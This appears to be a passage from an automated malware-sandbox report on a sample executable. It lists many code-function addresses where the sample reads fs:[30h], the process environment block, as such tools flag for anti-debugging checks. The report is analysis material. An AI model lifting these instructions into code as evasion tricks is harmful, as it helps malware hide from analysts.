Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BA4B0 mov eax, dword ptr fs:[00000030h]	10_2_016BA4B0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638770 mov eax, dword ptr fs:[00000030h]	10_2_01638770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770 mov eax, dword ptr fs:[00000030h]	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166674D mov esi, dword ptr fs:[00000030h]	10_2_0166674D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166674D mov eax, dword ptr fs:[00000030h]	10_2_0166674D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166674D mov eax, dword ptr fs:[00000030h]	10_2_0166674D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630750 mov eax, dword ptr fs:[00000030h]	10_2_01630750
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BE75D mov eax, dword ptr fs:[00000030h]	10_2_016BE75D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672750 mov eax, dword ptr fs:[00000030h]	10_2_01672750
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672750 mov eax, dword ptr fs:[00000030h]	10_2_01672750
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B4755 mov eax, dword ptr fs:[00000030h]	10_2_016B4755
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166C720 mov eax, dword ptr fs:[00000030h]	10_2_0166C720
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166C720 mov eax, dword ptr fs:[00000030h]	10_2_0166C720
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166273C mov eax, dword ptr fs:[00000030h]	10_2_0166273C
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166273C mov ecx, dword ptr fs:[00000030h]	10_2_0166273C
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166273C mov eax, dword ptr fs:[00000030h]	10_2_0166273C
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AC730 mov eax, dword ptr fs:[00000030h]	10_2_016AC730
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166C700 mov eax, dword ptr fs:[00000030h]	10_2_0166C700
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630710 mov eax, dword ptr fs:[00000030h]	10_2_01630710
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01660710 mov eax, dword ptr fs:[00000030h]	10_2_01660710
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016527ED mov eax, dword ptr fs:[00000030h]	10_2_016527ED
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016527ED mov eax, dword ptr fs:[00000030h]	10_2_016527ED
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016527ED mov eax, dword ptr fs:[00000030h]	10_2_016527ED
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BE7E1 mov eax, dword ptr fs:[00000030h]	10_2_016BE7E1
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016347FB mov eax, dword ptr fs:[00000030h]	10_2_016347FB
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016347FB mov eax, dword ptr fs:[00000030h]	10_2_016347FB
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163C7C0 mov eax, dword ptr fs:[00000030h]	10_2_0163C7C0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B07C3 mov eax, dword ptr fs:[00000030h]	10_2_016B07C3
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016307AF mov eax, dword ptr fs:[00000030h]	10_2_016307AF
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E47A0 mov eax, dword ptr fs:[00000030h]	10_2_016E47A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D678E mov eax, dword ptr fs:[00000030h]	10_2_016D678E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F866E mov eax, dword ptr fs:[00000030h]	10_2_016F866E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F866E mov eax, dword ptr fs:[00000030h]	10_2_016F866E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166A660 mov eax, dword ptr fs:[00000030h]	10_2_0166A660
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166A660 mov eax, dword ptr fs:[00000030h]	10_2_0166A660
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01662674 mov eax, dword ptr fs:[00000030h]	10_2_01662674
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164C640 mov eax, dword ptr fs:[00000030h]	10_2_0164C640
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164E627 mov eax, dword ptr fs:[00000030h]	10_2_0164E627
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01666620 mov eax, dword ptr fs:[00000030h]	10_2_01666620
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01668620 mov eax, dword ptr fs:[00000030h]	10_2_01668620
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163262C mov eax, dword ptr fs:[00000030h]	10_2_0163262C
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE609 mov eax, dword ptr fs:[00000030h]	10_2_016AE609
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164260B mov eax, dword ptr fs:[00000030h]	10_2_0164260B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164260B mov eax, dword ptr fs:[00000030h]	10_2_0164260B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164260B mov eax, dword ptr fs:[00000030h]	10_2_0164260B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164260B mov eax, dword ptr fs:[00000030h]	10_2_0164260B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164260B mov eax, dword ptr fs:[00000030h]	10_2_0164260B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164260B mov eax, dword ptr fs:[00000030h]	10_2_0164260B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164260B mov eax, dword ptr fs:[00000030h]	10_2_0164260B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672619 mov eax, dword ptr fs:[00000030h]	10_2_01672619
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE6F2 mov eax, dword ptr fs:[00000030h]	10_2_016AE6F2
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE6F2 mov eax, dword ptr fs:[00000030h]	10_2_016AE6F2
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE6F2 mov eax, dword ptr fs:[00000030h]	10_2_016AE6F2
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE6F2 mov eax, dword ptr fs:[00000030h]	10_2_016AE6F2
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B06F1 mov eax, dword ptr fs:[00000030h]	10_2_016B06F1
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B06F1 mov eax, dword ptr fs:[00000030h]	10_2_016B06F1
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166A6C7 mov ebx, dword ptr fs:[00000030h]	10_2_0166A6C7
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166A6C7 mov eax, dword ptr fs:[00000030h]	10_2_0166A6C7
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166C6A6 mov eax, dword ptr fs:[00000030h]	10_2_0166C6A6
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016666B0 mov eax, dword ptr fs:[00000030h]	10_2_016666B0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01634690 mov eax, dword ptr fs:[00000030h]	10_2_01634690
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01634690 mov eax, dword ptr fs:[00000030h]	10_2_01634690
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01656962 mov eax, dword ptr fs:[00000030h]	10_2_01656962
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01656962 mov eax, dword ptr fs:[00000030h]	10_2_01656962
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01656962 mov eax, dword ptr fs:[00000030h]	10_2_01656962
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0167096E mov eax, dword ptr fs:[00000030h]	10_2_0167096E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0167096E mov edx, dword ptr fs:[00000030h]	10_2_0167096E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0167096E mov eax, dword ptr fs:[00000030h]	10_2_0167096E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D4978 mov eax, dword ptr fs:[00000030h]	10_2_016D4978
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D4978 mov eax, dword ptr fs:[00000030h]	10_2_016D4978
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BC97C mov eax, dword ptr fs:[00000030h]	10_2_016BC97C
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B0946 mov eax, dword ptr fs:[00000030h]	10_2_016B0946
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B892A mov eax, dword ptr fs:[00000030h]	10_2_016B892A
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C892B mov eax, dword ptr fs:[00000030h]	10_2_016C892B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE908 mov eax, dword ptr fs:[00000030h]	10_2_016AE908
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE908 mov eax, dword ptr fs:[00000030h]	10_2_016AE908
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BC912 mov eax, dword ptr fs:[00000030h]	10_2_016BC912
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01628918 mov eax, dword ptr fs:[00000030h]	10_2_01628918
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01628918 mov eax, dword ptr fs:[00000030h]	10_2_01628918
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BE9E0 mov eax, dword ptr fs:[00000030h]	10_2_016BE9E0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016629F9 mov eax, dword ptr fs:[00000030h]	10_2_016629F9
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016629F9 mov eax, dword ptr fs:[00000030h]	10_2_016629F9
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C69C0 mov eax, dword ptr fs:[00000030h]	10_2_016C69C0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0163A9D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0163A9D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0163A9D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0163A9D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0163A9D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163A9D0 mov eax, dword ptr fs:[00000030h]	10_2_0163A9D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016649D0 mov eax, dword ptr fs:[00000030h]	10_2_016649D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FA9D3 mov eax, dword ptr fs:[00000030h]	10_2_016FA9D3
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0 mov eax, dword ptr fs:[00000030h]	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016309AD mov eax, dword ptr fs:[00000030h]	10_2_016309AD
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016309AD mov eax, dword ptr fs:[00000030h]	10_2_016309AD
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B89B3 mov esi, dword ptr fs:[00000030h]	10_2_016B89B3
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B89B3 mov eax, dword ptr fs:[00000030h]	10_2_016B89B3
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B89B3 mov eax, dword ptr fs:[00000030h]	10_2_016B89B3
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BE872 mov eax, dword ptr fs:[00000030h]	10_2_016BE872
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BE872 mov eax, dword ptr fs:[00000030h]	10_2_016BE872
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C6870 mov eax, dword ptr fs:[00000030h]	10_2_016C6870
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C6870 mov eax, dword ptr fs:[00000030h]	10_2_016C6870
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01642840 mov ecx, dword ptr fs:[00000030h]	10_2_01642840
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01660854 mov eax, dword ptr fs:[00000030h]	10_2_01660854
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01634859 mov eax, dword ptr fs:[00000030h]	10_2_01634859
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01634859 mov eax, dword ptr fs:[00000030h]	10_2_01634859
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01652835 mov eax, dword ptr fs:[00000030h]	10_2_01652835
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01652835 mov eax, dword ptr fs:[00000030h]	10_2_01652835
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01652835 mov eax, dword ptr fs:[00000030h]	10_2_01652835
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01652835 mov ecx, dword ptr fs:[00000030h]	10_2_01652835
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01652835 mov eax, dword ptr fs:[00000030h]	10_2_01652835
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01652835 mov eax, dword ptr fs:[00000030h]	10_2_01652835
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166A830 mov eax, dword ptr fs:[00000030h]	10_2_0166A830
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D483A mov eax, dword ptr fs:[00000030h]	10_2_016D483A
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D483A mov eax, dword ptr fs:[00000030h]	10_2_016D483A
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BC810 mov eax, dword ptr fs:[00000030h]	10_2_016BC810
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FA8E4 mov eax, dword ptr fs:[00000030h]	10_2_016FA8E4
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166C8F9 mov eax, dword ptr fs:[00000030h]	10_2_0166C8F9
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166C8F9 mov eax, dword ptr fs:[00000030h]	10_2_0166C8F9
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165E8C0 mov eax, dword ptr fs:[00000030h]	10_2_0165E8C0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630887 mov eax, dword ptr fs:[00000030h]	10_2_01630887
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BC89D mov eax, dword ptr fs:[00000030h]	10_2_016BC89D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0162CB7E mov eax, dword ptr fs:[00000030h]	10_2_0162CB7E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E4B4B mov eax, dword ptr fs:[00000030h]	10_2_016E4B4B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E4B4B mov eax, dword ptr fs:[00000030h]	10_2_016E4B4B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C6B40 mov eax, dword ptr fs:[00000030h]	10_2_016C6B40
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C6B40 mov eax, dword ptr fs:[00000030h]	10_2_016C6B40
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FAB40 mov eax, dword ptr fs:[00000030h]	10_2_016FAB40
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D8B42 mov eax, dword ptr fs:[00000030h]	10_2_016D8B42
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DEB50 mov eax, dword ptr fs:[00000030h]	10_2_016DEB50
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165EB20 mov eax, dword ptr fs:[00000030h]	10_2_0165EB20
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165EB20 mov eax, dword ptr fs:[00000030h]	10_2_0165EB20
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F8B28 mov eax, dword ptr fs:[00000030h]	10_2_016F8B28
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F8B28 mov eax, dword ptr fs:[00000030h]	10_2_016F8B28
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AEB1D mov eax, dword ptr fs:[00000030h]	10_2_016AEB1D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AEB1D mov eax, dword ptr fs:[00000030h]	10_2_016AEB1D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AEB1D mov eax, dword ptr fs:[00000030h]	10_2_016AEB1D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AEB1D mov eax, dword ptr fs:[00000030h]	10_2_016AEB1D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AEB1D mov eax, dword ptr fs:[00000030h]	10_2_016AEB1D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AEB1D mov eax, dword ptr fs:[00000030h]	10_2_016AEB1D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AEB1D mov eax, dword ptr fs:[00000030h]	10_2_016AEB1D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AEB1D mov eax, dword ptr fs:[00000030h]	10_2_016AEB1D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AEB1D mov eax, dword ptr fs:[00000030h]	10_2_016AEB1D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638BF0 mov eax, dword ptr fs:[00000030h]	10_2_01638BF0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638BF0 mov eax, dword ptr fs:[00000030h]	10_2_01638BF0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638BF0 mov eax, dword ptr fs:[00000030h]	10_2_01638BF0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165EBFC mov eax, dword ptr fs:[00000030h]	10_2_0165EBFC
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BCBF0 mov eax, dword ptr fs:[00000030h]	10_2_016BCBF0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01650BCB mov eax, dword ptr fs:[00000030h]	10_2_01650BCB
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01650BCB mov eax, dword ptr fs:[00000030h]	10_2_01650BCB
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01650BCB mov eax, dword ptr fs:[00000030h]	10_2_01650BCB
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630BCD mov eax, dword ptr fs:[00000030h]	10_2_01630BCD
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630BCD mov eax, dword ptr fs:[00000030h]	10_2_01630BCD
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630BCD mov eax, dword ptr fs:[00000030h]	10_2_01630BCD
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DEBD0 mov eax, dword ptr fs:[00000030h]	10_2_016DEBD0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640BBE mov eax, dword ptr fs:[00000030h]	10_2_01640BBE
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640BBE mov eax, dword ptr fs:[00000030h]	10_2_01640BBE
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E4BB0 mov eax, dword ptr fs:[00000030h]	10_2_016E4BB0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E4BB0 mov eax, dword ptr fs:[00000030h]	10_2_016E4BB0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166CA6F mov eax, dword ptr fs:[00000030h]	10_2_0166CA6F
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166CA6F mov eax, dword ptr fs:[00000030h]	10_2_0166CA6F
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166CA6F mov eax, dword ptr fs:[00000030h]	10_2_0166CA6F
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DEA60 mov eax, dword ptr fs:[00000030h]	10_2_016DEA60
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016ACA72 mov eax, dword ptr fs:[00000030h]	10_2_016ACA72
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016ACA72 mov eax, dword ptr fs:[00000030h]	10_2_016ACA72
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01636A50 mov eax, dword ptr fs:[00000030h]	10_2_01636A50
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01636A50 mov eax, dword ptr fs:[00000030h]	10_2_01636A50
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01636A50 mov eax, dword ptr fs:[00000030h]	10_2_01636A50
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01636A50 mov eax, dword ptr fs:[00000030h]	10_2_01636A50
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01636A50 mov eax, dword ptr fs:[00000030h]	10_2_01636A50
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01636A50 mov eax, dword ptr fs:[00000030h]	10_2_01636A50
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01636A50 mov eax, dword ptr fs:[00000030h]	10_2_01636A50
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640A5B mov eax, dword ptr fs:[00000030h]	10_2_01640A5B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640A5B mov eax, dword ptr fs:[00000030h]	10_2_01640A5B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166CA24 mov eax, dword ptr fs:[00000030h]	10_2_0166CA24
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165EA2E mov eax, dword ptr fs:[00000030h]	10_2_0165EA2E
